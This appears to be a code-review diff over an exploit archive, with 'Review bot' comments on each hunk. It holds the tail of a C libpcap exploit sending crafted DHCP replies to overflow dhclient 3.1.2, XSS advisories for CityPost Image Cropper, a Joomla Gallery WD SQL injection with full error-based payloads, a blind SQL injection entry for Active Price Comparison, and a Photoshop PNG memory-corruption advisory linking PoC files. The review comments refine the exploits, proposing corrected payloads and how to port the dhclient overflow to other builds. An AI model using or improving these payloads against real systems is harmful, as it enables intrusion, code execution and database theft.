while ((ch = getopt(argc, argv, "i:")) != -1) {
switch (ch) {
case 'i':
dev = optarg;
break;
default:
usage(argv);
}
}
if (!dev) {
dev = pcap_lookupdev(errbuf);
if (!dev) {
fprintf(stderr, "[-] couldn't find default interface: %s\n", errbuf);
exit(1);
}
}
ph = pcap_open_live(dev, PKT_BUFSIZ, 1, 1, errbuf);
if (!ph) {
fprintf(stderr, "[-] couldn't open interface %s: %s\n", dev, errbuf);
exit(1);
}
ret = pcap_compile(ph, &bfp, BPF_FILTER, 1, 0);
if (ret == -1) {
fprintf(stderr, "[-] couldn't parse BPF filter: %s\n", pcap_geterr(ph));
exit(1);
}
pcap_setfilter(ph, &bfp);
if (ret == -1) {
fprintf(stderr, "[-] couldn't set BPF filter: %s\n", pcap_geterr(ph));
exit(1);
}
printf("[+] listening on %s: %s\n", dev, BPF_FILTER);
pcap_loop(ph, -1, process, dev);
return 0;
}
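Review bot: the error check after `pcap_setfilter(ph, &bfp);` is dead: `ret` is never assigned from that call, so the following `if (ret == -1)` re-tests the earlier pcap_compile result and a failed setfilter goes unnoticed; write `ret = pcap_setfilter(ph, &bfp);`. Second, process() writes into the captured packet (`dhcp_h->op = DHCP_OP_REPLY;` and the memcpy into `dhcp_h->yiaddr`) although `pkt` is `const u_char *` from libpcap; the const is cast away through `eth_h`, and the header should be copied to a local buffer before being modified. Third, the payload layout is undocumented: the 68 bytes (16 zero, READABLE_1, READABLE_2, 8 zero, `\x04\x00\x00\x00`, 28 zero, JMP_TARGET) are what the subnet-mask option lands in script_write_params' stack frame, yet the header comment explains only READABLE_1/READABLE_2 (`es.client`, `es.prefix`) and JMP_TARGET; a comment per field naming the local it overwrites would make the exploit portable to other builds, which the "Only tested with dhclient 3.1.2 on 32-bit Gentoo" note invites. Also `pcap_lookupdev()` is deprecated in current libpcap, so a reader building this today should pass `-i`.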


@ -1,4 +1,8 @@
source: http://www.securityfocus.com/bid/13256/info
source: http://www.securityfocus.com/bid/13257/info
source: http://www.securityfocus.com/bid/13258/info
source: http://www.securityfocus.com/bid/13259/info
source: http://www.securityfocus.com/bid/13260/info
CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script.
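Review bot: five BIDs are folded into one file but the text still describes "a cross-site scripting vulnerability" in one script, so a reader cannot tell why one description cites five sources. The per-BID files removed below are identical apart from the source line and all carry the same PoC URL with `m1`, `m2`, `m3`, `imgsrc` and `m4`, so the merged entry should say how 13256 through 13260 relate to those parameters (one BID per parameter, if that is the case). The hunk shows only the source lines and the description; confirm that the impact paragraph and the PoC URL present in the removed files survive in the merged file beyond the hunk context.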


@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/13257/info
CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS]


@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/13258/info
CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS]


@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/13259/info
CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS]


@ -1,7 +0,0 @@
source: http://www.securityfocus.com/bid/13260/info
CityPost Image Cropper/Resizer is affected by a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input to the 'image-editor-52.php' script.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
http://www.example.com/image-editor-52/?m1=[XSS]&m2=[XSS]&m3=[XSS]&imgsrc=[XSS]&m4=[XSS]


@ -1,28 +0,0 @@
######################################################################
# Exploit Title: Joomla Gallery WD - SQL Injection Vulnerability
# Google Dork: inurl:option=com_gallery_wd
# Date: 29.03.2015
# Exploit Author: CrashBandicot (@DosPerl)
# Vendor HomePage: http://web-dorado.com/
# Source Component : http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-wd
# Tested on: Windows
######################################################################
parameter 'theme_id' in GET vulnerable
# Example :
# Parameter: theme_id (GET)
# Type: error-based
# GET Payload : index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2&theme_id=1 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
# ==================================================================================== #
parameter 'image_id' in POST vulnerable
# Example :
# URI : /index.php?option=com_gallery_wd&view=gallerybox&image_id=19&gallery_id=2
# Parameter: image_id (POST)
# Type: error-based
# POST Payload: image_id=19 AND (SELECT 6173 FROM(SELECT COUNT(*),CONCAT(0x716b627871,(MID((IFNULL(CAST(database() AS CHAR),0x20)),1,50)),0x716a6a7171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&rate=&ajax_task=save_hit_count&task=gallerybox.ajax_search
#EOF
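Review bot: no affected version and no expected response are given. "Tested on: Windows" describes the tester's machine, not the Gallery WD release, so the component version the two parameters were confirmed against is missing. Both payloads are the standard MySQL error-based technique (`COUNT(*) ... GROUP BY FLOOR(RAND(0)*2)` forcing a duplicate-key error) and look sqlmap-generated; a one-line statement of what the response contains would let a reader verify them: the markers 0x716b627871 and 0x716a6a7171 decode to `qkbxq` and `qjjqq`, and a vulnerable install returns a `Duplicate entry 'qkbxq<database name>qjjqq1'` error in the page body.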


@ -1,50 +0,0 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(reviews.aspx ProductID) Blind SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com
[~]Software: Active Price Comparison v 4
[~]author: ((я3d D3v!L))
[~] Date: 28.11.2008
[~] Home: www.ahacker.biz
[~] contact: N/A
[~] -----------------------------------------------------------
[~]3xpL0!7 4 d3m0:
http://www.activewebsoftwares.com/demoactivepricecomparison/reviews.aspx?ProductID={bL!ND}
[~] 8L!/\/D:
7Ru3 : links.asp?linkid=1 and 1=1
f4L53: links.asp?linkid=1 and 1=2
N073:
! 7h!/\/k u can f!nd m0r3
just let your m1nd breath ;)
[~]--------------------------------------------------------------------------------------
[~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري
[~]
[~] spechial thanks : dolly & 7am3m & عماد & {str0ke}
[~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~]
[~] xp10.biz & ahacker.biz
[~]
[~]---------------------------------------------------------------------------------------
# milw0rm.com [2008-11-30]
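Review bot: the blind-injection examples do not match the vulnerable endpoint. The demo URL is `reviews.aspx?ProductID={bL!ND}`, but the true/false pair is `links.asp?linkid=1 and 1=1` / `links.asp?linkid=1 and 1=2`, a different page and parameter, evidently pasted from another advisory; they should read `reviews.aspx?ProductID=1 and 1=1` and `... and 1=2`, with a sentence on what differs between the two responses, which is the whole proof for a boolean-based blind injection. The entry also names no version beyond "v 4" and no vendor contact, so removing it loses nothing that could be verified.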


@ -1,71 +0,0 @@
#####################################################################################
Application: Adobe Photoshop CC 2014 & Bridge CC 2014
Platforms: Windows
Versions: The vulnerability is confirmed in version Photoshop CC 2014 and Bridge CC 2014.
Secunia:
{PRL}: 2015-08
Author: Francis Provencher (Protek Research Labs)
Website: http://www.protekresearchlab.com/
Twitter: @ProtekResearch
#####################################################################################
1) Introduction
2) Report Timeline
3) Technical details
4) POC
#####################################################################################
===============
1) Introduction
===============
Adobe Photoshop is a raster graphics editor developed and published by Adobe Systems for Windows and OS X.
Photoshop was created in 1988 by Thomas and John Knoll. Since then, it has become the de facto industry standard in raster graphics editing, such that the word “photoshop” has become a verb as in “to photoshop an image,” “photoshopping,” and “photoshop contest,” etc. It can edit and compose raster images in multiple layers and supports masks, alpha compositing and several colour models including RGB,CMYK, Lab colour space (with capital L), spot colour and duotone. Photoshop has vast support for graphic file formats but also uses its own PSD and PSB file formats which support all the aforementioned features. In addition to raster graphics, it has limited abilities to edit or render text, vector graphics (especially through clipping path), 3D graphics and video. Photoshops featureset can be expanded by Photoshop plug-ins, programs developed and distributed independently of Photoshop that can run inside it and offer new or enhanced features.
(https://en.wikipedia.org/wiki/Adobe_Photoshop)
#####################################################################################
============================
2) Report Timeline
============================
2015-03-15: Francis Provencher from Protek Research Labs found the issue;
2015-03-19: Francis Provencher From Protek Research Labs report vulnerability to PSIRT;
2015-05-16: Adobe release a patch (APSB15-12)
#####################################################################################
============================
3) Technical details
============================
An error in the the PNG parser, could lead to a memory corruption when processing a crafted PNG image with an oversize value in the “Length” into the “CHUNK” Structure.
Successful exploitation of the vulnerabilities may allow execution of arbitrary code, but requires
tricking a user into opening or previewing a malicious file.
#####################################################################################
===========
4) POC
===========
http://protekresearchlab.com/exploits/PRL-2015-08.png
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/37349.png
###############################################################################
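Review bot: the technical details are too thin to act on. "An oversize value in the Length into the CHUNK Structure" does not say which PNG chunk type, whether the result is an out-of-bounds read or write, or what the parser does with the length (allocation size, copy size, or both), and the "Secunia:" field is empty, so the PoC PNG links are the only evidence. Since the timeline cites Adobe's APSB15-12, the entry should carry the CVE identifier that bulletin assigned to this issue so readers can map it to patched builds, and "Versions" should give the Photoshop CC 2014 and Bridge CC 2014 build numbers tested. Typo in section 3: "the the PNG parser".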